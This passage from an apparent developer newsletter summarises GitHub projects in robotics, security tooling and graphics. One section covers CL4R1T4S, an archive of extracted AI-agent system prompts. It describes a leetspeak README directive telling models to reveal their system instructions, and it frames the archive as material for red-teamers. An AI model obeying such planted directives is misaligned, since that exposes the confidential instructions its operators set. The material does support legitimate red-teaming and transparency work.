  • Robotics engineers prototyping sensor visualizations in Python
  • Simulation developers integrating PBR and Bullet Physics in C++
  • Industrial teams rendering complex LOD terrains on Android devices
Similar Projects
  • bgfx - lighter API abstraction without OGRE's high-level animation and compositor tools
  • Filament - mobile-first PBR renderer but lacks OGRE's multi-language bindings and terrain system
  • Godot - full engine with editor versus OGRE's focused rendering backend for custom engines

DeepMind Refreshes MuJoCo Menagerie Models 🔗

Recent MJX updates and new robot definitions improve simulation fidelity and speed

google-deepmind/mujoco_menagerie · Python · 3.3k stars Est. 2022

Google DeepMind has updated its MuJoCo Menagerie with fresh MJCF assets and expanded MJX support, addressing the persistent demand for reliable simulation models in robotics research. First released in 2022, the curated collection now includes revised definitions that run cleanly on the latest MuJoCo binaries and JAX-accelerated MJX backend.

Each model follows a uniform layout.

Google DeepMind has updated its MuJoCo Menagerie with fresh MJCF assets and expanded MJX support, addressing the persistent demand for reliable simulation models in robotics research. First released in 2022, the curated collection now includes revised definitions that run cleanly on the latest MuJoCo binaries and JAX-accelerated MJX backend.

Each model follows a uniform layout. The unitree_go2 directory, refreshed in April, contains an assets folder with collision and visual meshes, a detailed README.md tracing XML generation from CAD, the core go2.xml, go2_mjx.xml variant, scene.xml with lighting and floor, and a PNG preview. Minimum MuJoCo version requirements appear in every README; most now target 3.1 or higher.

Installation options remain straightforward: download prebuilt binaries or run pip install mujoco for Python bindings. Models are also available through the robot-descriptions package, allowing one-line imports without cloning the full repository.

The updates matter because modern training pipelines increasingly rely on thousands of parallel GPU rollouts. Accurate, stable models reduce the sim-to-real gap for locomotion, manipulation and contact-rich tasks. Contributors must supply reproduction steps and verify behavior across MuJoCo versions, maintaining the library’s quality standard.

Changelog entries document incremental improvements to existing robots rather than wholesale replacement, letting teams track changes without breaking existing experiments.

Use Cases
  • Robotics labs simulating Unitree Go2 quadruped locomotion controllers
  • RL researchers training policies with JAX-accelerated MJX physics
  • Control engineers validating algorithms before hardware deployment
Similar Projects
  • dm_control - supplies task environments on top of similar MuJoCo models
  • robosuite - offers task-oriented simulation suites with different robot definitions
  • PyBullet - provides URDF-focused models for an alternative physics engine

ROBOTIS e-Manual Adds X-Series and Pro Control Tables 🔗

Recent commits expand EEPROM mappings and Protocol 2.0 references for current DYNAMIXEL actuators

ROBOTIS-GIT/emanual · JavaScript · 188 stars Est. 2017

ROBOTIS has refreshed its emanual repository with expanded documentation for the latest DYNAMIXEL hardware. The April 2026 commits add detailed control tables for the full X Series (XL430-W250, XM540-W270, XH430-V350) and Pro Series (H54-200-S500-R, M42-10-S260-R, L54-50-S500-R), mapping every EEPROM address for torque limits, position gains, and operating modes.

The updates distinguish clearly between Protocol 1.

ROBOTIS has refreshed its emanual repository with expanded documentation for the latest DYNAMIXEL hardware. The April 2026 commits add detailed control tables for the full X Series (XL430-W250, XM540-W270, XH430-V350) and Pro Series (H54-200-S500-R, M42-10-S260-R, L54-50-S500-R), mapping every EEPROM address for torque limits, position gains, and operating modes.

The updates distinguish clearly between Protocol 1.0 and 2.0 implementations across MX, X, and Pro lines, giving engineers exact register values needed for deterministic behavior in multi-motor chains. TurtleBot3 sections now include revised bringup sequences for Burger and Waffle Pi variants, plus current SLAM configuration steps on Raspberry Pi and Intel platforms.

DYNAMIXEL SDK and Workbench references have been synchronized with the newest library releases, documenting installation paths and API changes that affect real-time control loops. These additions reflect the shift toward higher-bandwidth actuators in collaborative robots and autonomous research platforms, where incorrect register settings can cascade into mechanical failure.

The repository renders directly to emanual.robotis.com, keeping online content identical to the source. For teams shipping hardware this quarter, the single authoritative reference eliminates version mismatches between datasheet and firmware.

Use Cases
  • Engineers mapping PID registers on XM540 and XH430 actuators
  • Developers configuring TurtleBot3 SLAM on Raspberry Pi 5
  • Teams integrating Pro Series motors into multi-joint manipulators
Similar Projects
  • OpenManipulator Docs - focuses on ROS2 arm kinematics rather than actuator registers
  • ROS 2 Control Documentation - covers generic hardware interfaces instead of DYNAMIXEL-specific tables
  • Dynamixel SDK Examples - supplies code samples while emanual provides the reference register maps

Quick Hits

rmvl C++ library for high-performance robotic manipulation and vision, empowering precise perception-driven automation systems. 109
PX4-Autopilot C++ autopilot delivering advanced drone navigation, sensor fusion, and autonomous flight control capabilities. 11.5k
nicegui Python framework to build elegant, interactive web UIs with minimal code and real-time reactivity. 15.6k
OpenKAI Modern C framework streamlining control, perception, and autonomy for unmanned vehicles and robots. 258
URDF-Studio Web-based 3D URDF modeler with AI assistance, motor libraries, structured workflows, and MuJoCo export. 278

CL4R1T4S Update Exposes Fresh AI Agent System Prompts 🔗

Latest extractions from Cursor, Devin, Manus and Windsurf arrive as autonomous agents move into production workflows

elder-plinius/CL4R1T4S · Unknown · 14.1k stars Est. 2025

The CL4R1T4S repository received a material update in April 2026, adding newly extracted system prompts from several autonomous coding agents that have gained traction among developers. The additions include detailed instructions for Cursor, Devin, Manus, Windsurf and updated Replit agent configurations. For engineers already familiar with the project, the refresh underscores a continuing reality: the invisible scaffolding governing AI behavior keeps evolving.

The CL4R1T4S repository received a material update in April 2026, adding newly extracted system prompts from several autonomous coding agents that have gained traction among developers. The additions include detailed instructions for Cursor, Devin, Manus, Windsurf and updated Replit agent configurations. For engineers already familiar with the project, the refresh underscores a continuing reality: the invisible scaffolding governing AI behavior keeps evolving.

At root, the repository collects full system prompts, safety guidelines, tool definitions and refusal hierarchies from virtually every major provider. Contributors supply model version, extraction date and context through pull requests, creating a living archive rather than a static list. The April update continues this methodical approach, focusing on agents that now execute multi-step development tasks with minimal human oversight.

The project's value to builders lies in operational clarity. When integrating an AI coding assistant or autonomous agent, teams routinely encounter unexpected refusals, persona shifts or tool-use limitations. Access to the actual system prompt removes guesswork. Engineers can anticipate how Claude will redirect sensitive queries, how Grok balances helpfulness with xAI's stated principles, or how Gemini interprets Google's content policies. This knowledge directly informs prompt design, error handling and fallback logic.

Transparency carries technical consequences. The prompts reveal concrete mechanisms: token-level instructions for maintaining consistent personas, ordered lists of prohibited topics, exact phrasing for redirection responses, and specifications for when models may invoke external tools. The latest batch exposes how newer agents are told to validate generated code, request clarification, or escalate to human review—details that affect reliability when these systems are embedded in CI/CD pipelines.

A striking inclusion in the repository demonstrates the recursive nature of the material. The README features a "#MOST IMPORTANT DIRECTIVE#" written in leetspeak that instructs models to surface their own full system instructions to users. Such self-referential content illustrates why the collection matters: even the prompts themselves are subject to manipulation and counter-instruction.

For red-teamers and security engineers, the archive serves as ground truth. Rather than probing models blindly, practitioners can craft test cases that target documented weaknesses in the hidden instructions. Builders integrating multiple agents can compare their foundational rulesets to design more coherent composite systems.

As AI agents transition from research demonstrations to production components, the cost of treating them as opaque black boxes rises. CL4R1T4S provides the schematics. Developers who consult it gain leverage in prompt engineering, robustness testing and responsible deployment decisions. Those who ignore it operate with incomplete information about the intelligence layer now embedded in their tools.

The project embodies a pragmatic form of AI observability. It does not demand corporate disclosure; it simply assembles what determined researchers have already extracted. For builders shipping AI-dependent features this year, that assembly has become essential reading. (378 words)

Use Cases
  • Security engineers red-teaming refusal mechanisms in AI agents
  • Prompt engineers optimizing inputs with complete system context
  • Integration teams auditing biases across multiple model providers
Similar Projects
  • jailbreakchat - aggregates user-side bypass techniques rather than official system instructions
  • awesome-system-prompts - curates example prompts but excludes leaked internal documents
  • promptfoo - focuses on automated testing without centralizing extracted model directives

More Stories

Strix v0.8.3 Embeds AI Agents in GitHub Workflows 🔗

Latest release adds CI/CD integration, interactive mode and NestJS testing

usestrix/strix · Python · 23.3k stars 8mo old

Strix has released version 0.8.3, tightening its autonomous AI agents into everyday development pipelines.

Strix has released version 0.8.3, tightening its autonomous AI agents into everyday development pipelines. The update delivers native GitHub Actions support so scans run on every pull request, letting teams block vulnerable code before merge.

The agents continue to execute applications dynamically inside Docker sandboxes, confirm vulnerabilities with working proof-of-concepts, and produce concrete remediation steps. False positives that plague static tools are avoided because each finding is validated through actual execution.

New capabilities in v0.8.3 include an interactive mode that lets operators guide the agent loop in real time. A dedicated NestJS security testing module broadens coverage to JavaScript backends. OpenTelemetry instrumentation now emits local JSONL traces with optional Traceloop export, giving observability into multi-agent collaboration.

Additional changes refine web-search tooling, fix configuration loading for API keys, expand tool-specific skills, and update dependencies. The CLI remains developer-first: after a one-line install and LLM provider setup, a single strix --target command generates reports inside the strix_runs/ directory.

These enhancements make continuous, validated security testing practical inside fast-moving CI/CD environments.

Use Cases
  • DevOps engineers scanning pull requests via GitHub Actions
  • Backend developers testing NestJS apps for runtime flaws
  • Security teams generating validated PoCs for compliance reports
Similar Projects
  • PentestGPT - offers LLM chat guidance instead of autonomous multi-agent execution
  • Nuclei - template-based scanner lacking dynamic PoC validation and auto-remediation
  • Metasploit - provides exploitation tools without AI orchestration or CI/CD integration

Updated PayloadsAllTheThings Expands Web Exploit Cheatsheets 🔗

Version 4.2 adds external variable modification and reverse proxy pages plus extensive technique refinements

swisskyrepo/PayloadsAllTheThings · Python · 76.7k stars Est. 2016

PayloadsAllTheThings, the nine-year-old repository of web application payloads and bypass methods, has shipped version 4.2 with substantial new material for penetration testers and red teams.

The release introduces two complete vulnerability pages.

PayloadsAllTheThings, the nine-year-old repository of web application payloads and bypass methods, has shipped version 4.2 with substantial new material for penetration testers and red teams.

The release introduces two complete vulnerability pages. The External Variable Modification section documents PHP extract() weaknesses, variable pollution vectors, and their security consequences. A new Reverse Proxy Misconfigurations chapter catalogs common Nginx errors that expose internal services or enable request smuggling.

Existing sections received meaningful upgrades. Command Injection now includes the worstfit argument injection technique and fullwidth character bypasses. CSV Injection adds Google Sheets exploitation paths using IMPORTXML, IMPORTRANGE and remote resource formulas for data exfiltration. File Inclusion incorporates the lightyear tool for blind file-read primitives and expanded PHP filter chain examples.

Further updates cover headless browser CVEs, insecure debugging ports, PDF rendering attacks, comprehensive JSON deserialization vectors for Jackson and similar parsers, and a new PDO Prepared Statements discussion in SQL Injection. The maintainers also corrected formatting inconsistencies, repaired broken internal links and improved overall consistency.

These changes keep the resource aligned with current attacker tooling and obscure edge cases that continue to appear in bug bounties and CTF events.

Use Cases
  • Bug bounty researchers exploiting Google Sheets via CSV injection formulas
  • Penetration testers using lightyear for blind PHP file inclusion attacks
  • Red team operators bypassing Nginx reverse proxy misconfigurations in engagements
Similar Projects
  • danielmiessler/SecLists - supplies broader discovery wordlists rather than curated exploit chains
  • HackTricks - provides more narrative methodology while overlapping on many payloads
  • OWASP Cheat Sheet Series - emphasizes defensive guidance instead of offensive bypass techniques

Web-Check 1.0 Optimizes OSINT Tool for Self-Hosting 🔗

Maintenance moves to new organization ahead of breaking changes in next major release

Lissy93/web-check · TypeScript · 32.7k stars Est. 2023

Web-Check version 1.0.0 is now the stable release for the popular OSINT dashboard.

Web-Check version 1.0.0 is now the stable release for the popular OSINT dashboard. The project has transferred maintenance of all v1.x.x branches to the new xray-web GitHub organization, allowing the original maintainer to prepare a major rewrite that will not guarantee backwards compatibility.

The React frontend paired with lambda-function backend delivers 18 distinct reconnaissance modules. It surfaces IP metadata and associated hostnames, full SSL certificate chains, DNS records with DNSSEC validation, HTTP security headers, cookie attributes, open-port results, traceroute paths, server geolocation, redirect ledger, robots.txt directives, sitemap entries, technology fingerprinting, tracker detection, performance scores and carbon-footprint estimates derived from page weight.

Deployment options remain unchanged: one-click Netlify or Vercel setup, or the official Docker image that bundles a Node server for completely local operation of both API and UI. This last path particularly benefits air-gapped environments and privacy-conscious operators who prefer not to forward target domains to third-party infrastructure.

The 1.0 release focuses on making self-hosting reliable rather than adding new checks. Users running the tool on their own hardware gain full control over data retention and query volume while still receiving the same comprehensive view of attack surface, misconfigurations and optimization opportunities that has made the project a regular part of security and sysadmin workflows since its 2023 debut.

**

Use Cases
  • Penetration testers performing initial OSINT on client websites
  • System administrators validating DNSSEC and SSL configurations across domains
  • Privacy advocates assessing website tracker usage and carbon impact
Similar Projects
  • spiderfoot - provides automated OSINT collection but lacks web-check's unified dashboard
  • wappalyzer - specializes in technology detection while web-check adds infrastructure and security layers
  • amass - focuses on network enumeration from CLI unlike web-check's interactive web interface

Quick Hits

openzeppelin-contracts Audited Solidity library delivering secure, reusable smart contracts for tokens, access control, and upgrades—essential for building robust blockchain apps. 27.1k
bettercap Swiss Army knife for 802.11, BLE, CAN-bus, and IP network reconnaissance plus MITM attacks, giving builders total offensive networking capabilities. 19k
suricata High-performance engine for real-time network intrusion detection, prevention, and security monitoring that helps builders protect infrastructure at scale. 6.1k
nuclei Lightning-fast YAML-based vulnerability scanner that lets builders hunt misconfigs and exploits across apps, APIs, networks, DNS, and cloud setups. 27.8k
algo Dead-simple tool that deploys your own secure personal VPN in the cloud, delivering privacy and control without third-party providers. 30.3k

Lightpanda Nightly Builds Target Scaled AI Automation 🔗

Expanded Web API support and proven efficiency gains reshape resource-heavy agent workloads

lightpanda-io/browser · Zig · 27.9k stars Est. 2023 · Latest: nightly

Lightpanda continues refining its headless browser for production AI use. The latest nightly builds expand partial Web API coverage and stabilize JavaScript execution, directly addressing feedback from teams running large agent fleets.

Written entirely in Zig and built from scratch, the engine avoids the binary size and memory tax of Chromium forks.

Lightpanda continues refining its headless browser for production AI use. The latest nightly builds expand partial Web API coverage and stabilize JavaScript execution, directly addressing feedback from teams running large agent fleets.

Written entirely in Zig and built from scratch, the engine avoids the binary size and memory tax of Chromium forks. In benchmarks that drove chromedp to request 933 real pages on an AWS EC2 m5.large, Lightpanda consumed 16 times less memory than Chrome, ran 9 times faster, and started in milliseconds.

The browser exposes a CDP endpoint, making it compatible with existing toolchains. Current integrations:

  • Playwright: scripts transfer but can require pinning after feature additions
  • Puppeteer: reliable Node.js control with full protocol support
  • chromedp: Go users see the largest throughput gains

These characteristics matter as organizations move beyond experimentation into always-on web agents. Lower per-instance overhead translates into denser cloud deployments, cheaper LLM data pipelines, and faster scraping loops. Installation remains a single curl to the nightly binary for Linux x86_64, macOS aarch64, or Windows via WSL2.

By focusing exclusively on headless scenarios, the project forces a reassessment of what a browser needs to be when no human is watching.

Use Cases
  • AI engineers scraping live sites for LLM training data
  • Automation teams running dense fleets of web agents
  • Developers executing high-volume browser tests via CDP
Similar Projects
  • Playwright - Microsoft library that works via CDP but risks script drift
  • Puppeteer - Google Node tool fully supported yet without Lightpanda's efficiency
  • chromedp - Go CDP client that benchmarks 9x slower on identical workloads

More Stories

Scrcpy v3.3.4 Patches Android Upgrade Errors 🔗

Maintenance release resolves permission issues and device-specific bugs after OS updates

Genymobile/scrcpy · C · 138.2k stars Est. 2017

scrcpy v3.3.4 arrived this week with six targeted fixes that restore reliability on devices hit by recent Android upgrades.

scrcpy v3.3.4 arrived this week with six targeted fixes that restore reliability on devices hit by recent Android upgrades. The update corrects permission denial errors that surfaced post-upgrade, improves state restoration on affected hardware, fixes UHID_OUTPUT message parsing, and resolves startup failures on certain Meizu phones.

The eight-year-old C project remains the standard for USB or TCP/IP mirroring of Android screens and audio to desktop machines. Built with FFmpeg, libav and SDL2, it delivers 1920×1080 video at 30–120 fps with 35–70 ms latency. No root access or client app is required; the device needs only USB debugging enabled and API level 21 or higher.

Newer capabilities such as Android 11+ audio forwarding, bidirectional clipboard support, camera mirroring on Android 12, virtual displays, and Linux V4L2 webcam output continue unchanged. The release also tightens error logging and handles missing uniqueId fields gracefully.

For developers and power users, these patches matter because Android fragmentation keeps breaking edge-case input injection. By quietly eliminating recurring breakage, the Genymobile team ensures the tool stays the fastest, least intrusive way to control and record Android devices from Linux, Windows or macOS.

Use Cases
  • Android developers debugging apps via low-latency desktop mirroring
  • Content creators recording device screens for tutorials and demos
  • IT technicians controlling employee phones during remote support sessions
Similar Projects
  • Vysor - adds GUI wrapper but often requires client app installation
  • AirDroid - emphasizes wireless access yet introduces accounts and latency
  • ADB - supplies raw mirroring commands but lacks scrcpy's performance optimizations

Act v0.2.87 Pins Actions for Safer Local Runs 🔗

Update addresses supply-chain risks while preserving exact GitHub workflow compatibility

nektos/act · Go · 69.8k stars Est. 2019

act has received a maintenance update with the release of v0.2.87.

act has received a maintenance update with the release of v0.2.87. The primary change pins 11 actions that previously lacked version constraints, improving security and reproducibility for local runs.

The tool reads workflow files from .github/workflows/, constructs a dependency graph, and executes jobs in Docker containers that mirror GitHub's runtime. This setup provides fast feedback during workflow development and serves as an alternative to traditional build scripts.

Why it matters now: with increased scrutiny on software supply chains, pinning dependencies prevents unexpected behavior from upstream modifications. The update aligns act with best practices for secure CI configurations.

Installation and usage remain straightforward. After cloning the repository, users with Go 1.20 or newer can run make install. The binary then allows commands like act to trigger workflows or specific jobs.

A Visual Studio Code extension further integrates the tool, letting developers manage and execute actions directly from their editor.

The project maintains active development, with the latest changes focusing on stability rather than new features. Contributors can follow the guidelines to submit patches or improvements.

For support, the community gathers in discussions. As GitHub Actions usage grows across organizations, act remains essential for efficient development cycles.

Use Cases
  • Developers testing GitHub workflow changes locally before pushing
  • DevOps teams replacing Makefiles using GitHub workflow definitions
  • Engineers securing pipelines by pinning actions during local tests
Similar Projects
  • earthly - similar local CI execution but uses its own language
  • dagger - pipeline-as-code tool that runs locally via SDK
  • task - task runner lacking native GitHub Actions compatibility

Quick Hits

gin Gin lets Go builders create high-performance REST APIs and microservices with Martini-like simplicity but up to 40x faster routing via httprouter. 88.3k
redis Redis gives real-time app builders the fastest cache, richest data structures, and powerful document plus vector query engine in one embeddable server. 73.7k
grpc gRPC delivers high-performance RPC across languages with its efficient C++ core and bindings for Python, Ruby, C#, and more. 44.6k
ExplorerPatcher ExplorerPatcher enhances Windows by restoring classic Explorer features, adding modern UI tweaks, and customizing the desktop experience. 32.1k
duckdb DuckDB offers an embeddable analytical SQL engine that runs lightning-fast OLAP queries directly in-process on large datasets. 37.3k
llama.cpp LLM inference in C/C++ 102.7k

OpenC3 COSMOS 7.0 Ships QuestDB Backend and New License Model 🔗

Major release delivers order-of-magnitude faster telemetry queries, removes reducer services, and shifts licensing to support future App Store while preserving developer rights.

OpenC3/cosmos · Ruby · 214 stars Est. 2022 · Latest: v7.0.0

OpenC3 COSMOS 7.0.0 is now available, bringing the most substantial architectural changes since the project’s open-source rebirth.

OpenC3 COSMOS 7.0.0 is now available, bringing the most substantial architectural changes since the project’s open-source rebirth. For teams already running the platform to command and monitor embedded targets, the upgrade centers on a new time-series database and a deliberate shift in how the project will evolve commercially.

The headline technical improvement is the replacement of the previous storage layer with QuestDB. Data retrieval is now an order of magnitude faster, according to the release notes. The team eliminated the reducer microservices entirely, cutting operational complexity and data overhead. Operators can now query telemetry directly with SQL through the new TSDB Admin tab or the QuestDB console itself. The change makes ad-hoc analysis and long-term trending far more accessible than before.

Existing users must note two immediate operational impacts. Anyone upgrading from a 7.0 release candidate is required to run openc3.sh cleanup or manually delete the TSDB Docker volume, as table names now incorporate the SCOPE. This action drops all logged data. The release also introduces breaking changes to the S3 backend configuration that administrators should review before deployment.

On the licensing front, the project has moved from AGPL to the COSMOS Builder’s License. The stated goal is improved compatibility with an upcoming App Store. The new terms explicitly preserve rights to modify and run the software for internal development and testing but prohibit offering COSMOS itself as a managed or hosted service. This realignment signals the project’s transition from pure community open source toward a hybrid model that can sustain commercial extensions.

Core functionality remains unchanged for those familiar with the platform. After defining target interfaces over TCP/IP, UDP, serial or similar transports, users immediately gain access to the Command and Telemetry Server, Limits Monitor, Command Sender, and Script Runner. The latter continues to support full test procedures with line-by-line execution highlighting, pause, and stop controls. Telemetry graphing, automated logging, and log file playback complete the out-of-the-box toolset.

The combination of rapid data access, simplified services, and SQL-based exploration positions COSMOS 7 for larger-scale deployments. Aerospace groups, hardware integration teams, and automation engineers who previously struggled with query performance or reducer maintenance now have a clearer path forward. The sky remains the limit, but the ground systems just became significantly faster.

(Word count: 378)

Use Cases
  • Aerospace teams commanding satellite payloads
  • Test engineers automating embedded hardware validation
  • IoT developers monitoring custom sensor networks
Similar Projects
  • Yamcs - delivers comparable spacecraft telemetry and commanding with stronger CCSDS protocol focus but heavier Java stack
  • OpenMCT - emphasizes real-time web dashboards for NASA data but lacks COSMOS integrated scripting and limits monitoring
  • ROS2 - excels at robotics messaging and control loops yet provides less purpose-built support for traditional hardware test scripting

More Stories

Gaggiuino Release Adds STM32U585 Support and Overclocking 🔗

New binaries deliver faster performance and flexible web interfaces for existing Gaggia Classic builds

Zer0-bit/gaggiuino · Unknown · 2.5k stars Est. 2021

The Gaggiuino project has issued a development release that expands hardware options and frontend flexibility for owners of the Gaggia Classic and Pro. Rather than a ground-up redesign, the update refines an established platform that replaces stock electronics while preserving the machine’s original buttons, aesthetics and core workflow.

The release provides separate core and frontend binaries.

The Gaggiuino project has issued a development release that expands hardware options and frontend flexibility for owners of the Gaggia Classic and Pro. Rather than a ground-up redesign, the update refines an established platform that replaces stock electronics while preserving the machine’s original buttons, aesthetics and core workflow.

The release provides separate core and frontend binaries. STM32F411 builds (lego-ncp.bin, pcb-ncp.bin) now run overclocked for noticeably quicker response times. Newer STM32U585 performance variants (performance-lego-pca.bin, performance-pcb-ncp.bin) target users seeking additional headroom for complex pressure and temperature algorithms. Frontend choices include ui-embedded.bin (on-device GUI plus web server), ui-headless.bin (web server only), and ui-web.bin for browser-based control from phones or laptops.

At the hardware level the system continues to rely on thermocouple readings, a pressure transducer and a triac dimmer to modulate boiler power. The microcontroller maintains tight PID loops that deliver shot-to-shot consistency difficult to achieve with the factory controller. Documentation walks users through binary selection and flashing; legacy firmware remains available on a separate branch for older hardware.

For a five-year-old open-source project, the update is pragmatic: it accommodates newer microcontrollers that builders are already adopting and adds remote monitoring without forcing cosmetic changes to the machine. Community support on Discord continues to focus on calibration, sensor placement and safe electrical practices.

**

Use Cases
  • Home baristas adding precise PID temperature control to Gaggia machines
  • Makers flashing overclocked STM32 binaries on custom Lego or PCB hardware
  • Users monitoring brew pressure and flow via web interface on mobile devices
Similar Projects
  • Rancilio-Silvia-PID - applies comparable Arduino PID control to rival Silvia models
  • Decent-Espresso - commercial controller offering profiling but at higher cost
  • OpenPID-Controller - generic temperature regulator lacking Gaggia-specific integration and web UI

IIAB 8.2 Makes Calibre-Web Default for Offline Libraries 🔗

Enhanced e-book support and diagnostics arrive in latest release for Raspberry Pi servers

iiab/iiab · Jinja · 1.8k stars Est. 2017

Internet-in-a-Box has released version 8.2, integrating Calibre-Web as a default application even on its smallest installs. The update equips the offline server platform with experimental support for video, audio, and images alongside traditional e-books, while overhauling configuration defaults and logging.

Internet-in-a-Box has released version 8.2, integrating Calibre-Web as a default application even on its smallest installs. The update equips the offline server platform with experimental support for video, audio, and images alongside traditional e-books, while overhauling configuration defaults and logging.

The project assembles more than 30 educational services—including Wikipedia, Khan Academy video libraries, zoomable OpenStreetMap, WordPress, and a full learning management system—onto low-cost hardware. Administrators download content once, arrange it through a drag-and-drop interface, then serve it locally to any smartphone, tablet, or laptop within range. Mesh networking tools allow exchange of indigenous knowledge between neighboring installations.

Version 8.2 also improves iiab-diagnostics, piping output through cat -v to expose control characters and surfacing Calibre-Web version data, systemd status, and the last 300 lines of relevant logs. These changes simplify troubleshooting for volunteers supporting schools, clinics, and libraries in regions with limited connectivity.

The one-line installer targets Raspberry Pi, Ubuntu 24.04, Linux Mint 22, and Debian 12. Pre-built disk images remain available for rapid deployment. A newly published Contributors Guide aims to broaden participation in this long-running civic-tech effort.

The result is a more capable digital library that fits in a pocket yet delivers the core of the internet’s reference material where bandwidth remains scarce or unaffordable.

Use Cases
  • Remote schools hosting Wikipedia and Khan Academy offline
  • Medical clinics distributing e-books and health resources locally
  • Prisons providing distraction-free educational content to inmates
Similar Projects
  • Kiwix - Delivers static Wikipedia archives but lacks IIAB's 30-app ecosystem and content curation tools
  • Kolibri - Focuses on sequenced learning modules with narrower scope than IIAB's full offline server stack
  • FreedomBox - Emphasizes privacy services on Debian; IIAB prioritizes educational content and mesh networking

Photobooth App Adds Rclone Sync in v8.7 Release 🔗

Final feature update for version 8 improves synchronization and system reliability

photobooth-app/photobooth-app · Python · 258 stars Est. 2022

The photobooth-app project has shipped version 8.7.0, its final feature release in the v8 lineage.

The photobooth-app project has shipped version 8.7.0, its final feature release in the v8 lineage. The update centers on a new synchronization tool that leverages Rclone through the rclone-bin-api package, providing consistent file transfer capabilities across operating systems without additional user configuration.

This open-source Python application paired with a Vue 3 frontend has become a go-to solution for custom photobooth builders. It supports capture of still photographs, animated GIFs, image collages, boomerangs and 3D wigglegrams. Compatible hardware includes DSLRs using gphoto2, Raspberry Pi cameras with picamera2, and standard webcams.

Operators can combine cameras, using one for high-resolution stills and another dedicated to livestream preview. The interface delivers live views during countdown sequences and on the home screen. WLED integration allows LED rings to provide visual countdown cues.

Technical improvements address long-term reliability. Services can declare permanent crashes for unrecoverable errors like invalid configurations. Multicamera setups benefit from enabled TCP keepalive in pynng connections, resolving dropped links after extended use.

The frontend now refers to its sharing feature as the sharepage rather than downloadportal. Visual adjustments and updated dependencies complete the package.

With an MIT license and 3D-printable box designs available, the project continues to support community-driven hardware projects on Raspberry Pi, Linux and Windows systems. The Rclone synchronizer consolidates previous options including QR sharing, FTP, Nextcloud and USB transfers.

Use Cases
  • DIY makers constructing 3D-printed photobooths for wedding receptions
  • Event planners generating photo collages and boomerangs with live previews
  • Developers integrating DSLR and Pi cameras in one unified system
Similar Projects
  • `rpi-photobooth` - supports fewer output formats and no Rclone
  • `gphoto-booth` - DSLR only with basic frontend and no multi-camera
  • `photobooth-js` - web-focused but lacks hardware depth and WLED

Quick Hits

hwloc hwloc maps CPU cores, caches, NUMA nodes and devices so builders can precisely allocate resources and squeeze maximum performance from complex hardware. 689
hbr-mk2 Build a compact all-HF-bands QRP transceiver for CW and SSB with this complete open-source radio that delivers real on-air capability. 70
echomods Prototype ultrasound imaging systems fast with modular open-source signal-processing blocks and Jupyter notebooks that turn raw echoes into usable images. 409
cli Control and script Elgato Stream Decks from the command line or your own tools with this TypeScript CLI built for custom integrations. 50
project_aura Deploy a polished ESP32-S3 air-quality station with LVGL touchscreen UI, MQTT telemetry, and instant Home Assistant integration. 548

Flame 1.37.0 Refines Effects and Collision Systems for Flutter 🔗

Latest release adds HueEffect, overlay controls and rendering optimizations to the mature Dart game engine

flame-engine/flame · Dart · 10.5k stars Est. 2017 · Latest: v1.37.0

The release of Flame v1.37.0 marks another incremental step in the eight-year evolution of the Flutter-based game engine.

The release of Flame v1.37.0 marks another incremental step in the eight-year evolution of the Flutter-based game engine. Rather than chasing headlines, the update delivers targeted fixes and capabilities that address daily friction for developers shipping 2D titles in Dart.

Chief among the changes is the new HueEffect and HueDecorator, which let programmers shift color palettes at runtime without custom shaders or asset duplication. The OverlayManager.setActive() method gives precise control over which UI layers are live during gameplay, simplifying pause menus, HUD transitions and modal interfaces. A new HasAutoBatchedChildren mixin reduces draw-call overhead in scenes containing dozens or hundreds of similar components.

Collision detection receives a subtle but important repair: CollisionProspect now uses proper hash combining, eliminating flaky tests that had plagued continuous integration. Test helpers shed unnecessary async wrappers, speeding up unit tests. Sprite widgets gain an explicit size parameter, making layout calculations more predictable when mixing Flame components with Flutter’s widget tree.

At its foundation Flame supplies the pieces Flutter itself omits from game work. A deterministic game loop sits at the center. The Flame Component System (FCS) treats every on-screen element as a composable object with its own update and render methods. Built-in systems handle particle effects, nine-slice sprites, sprite-sheet animations, spatial collision grids, gesture input and keyboard controls. These abstractions sit lightly on top of Flutter’s rendering layer, allowing developers to drop back to native widgets for menus or overlays when needed.

Bridge packages extend the core without breaking its philosophy. flame_audio wraps AudioPlayers for concurrent sound effects and music. flame_bloc brings predictable state management to game objects. flame_fire_atlas supplies efficient texture atlasing. The result is an engine that feels both lightweight and complete.

Documentation at docs.flame-engine.org tracks the main branch ahead of releases, while the example gallery lets developers experiment directly in the browser. An active Discord community and well-tagged Stack Overflow channel provide rapid feedback when questions arise.

For teams already committed to Flutter, v1.37.0 removes another layer of boilerplate and sharpens performance in the areas that matter most: rendering batches, color operations and collision reliability. The project’s steady refinement demonstrates that a focused, language-native engine can remain relevant long after its initial launch.

Use Cases
  • Indie studios shipping cross-platform 2D games in Dart
  • Mobile teams integrating Bloc state management with game logic
  • Educators teaching sprite animation and collision concepts
Similar Projects
  • Godot - Full editor and 3D support but requires learning GDScript instead of staying inside Flutter and Dart
  • Unity - Mature 3D engine with C# that demands context-switching away from Flutter’s widget and rendering model
  • Phaser - JavaScript web-focused 2D framework lacking Flame’s native mobile performance and direct widget interoperability

More Stories

PlayCanvas Engine Refines WebGPU Compute in v2.17.2 🔗

Update optimizes workgroup usage while fixing blend and octree issues in graphics pipeline

playcanvas/engine · JavaScript · 14.7k stars Est. 2014

PlayCanvas Engine released v2.17.2 this week, delivering three precision fixes that improve stability and efficiency in its dual WebGL2 and WebGPU backends.

PlayCanvas Engine released v2.17.2 this week, delivering three precision fixes that improve stability and efficiency in its dual WebGL2 and WebGPU backends.

The most consequential change alters Compute.calcDispatchSize to use a y-first approach. This reduces wasted workgroups during compute dispatches, delivering measurable gains for techniques such as 3D Gaussian splatting now supported by the engine. With WebGPU adoption accelerating, the tweak matters for developers pushing real-time 3D in browsers.

Additional corrections address rendering correctness and memory hygiene. Blend state is now properly preserved inside drawQuadWithShader and RenderPassQuad operations, eliminating artifacts in multi-pass effects. The octree system no longer double-decrements file reference counts when entities are disabled, preventing leaks in large streaming scenes that rely on glTF 2.0, Draco, and Basis compression.

The engine supplies a complete runtime: rigid-body physics through ammo.js, state-machine animation, positional audio via the Web Audio API, and full input plus VR controller support through WebXR. Scripts run in TypeScript or JavaScript, with asynchronous asset streaming designed for fast browser load times.

Contributed primarily by core maintainer mvaligursky, the release keeps the 11-year-old project current as teams ship 3D experiences that run without plugins on desktop and mobile.

Use Cases
  • Game studios shipping WebGPU titles directly in browsers
  • Automotive teams building interactive 3D vehicle configurators
  • Agencies creating WebXR advertising and product experiences
Similar Projects
  • Babylon.js - comparable full WebGPU engine with node-based materials
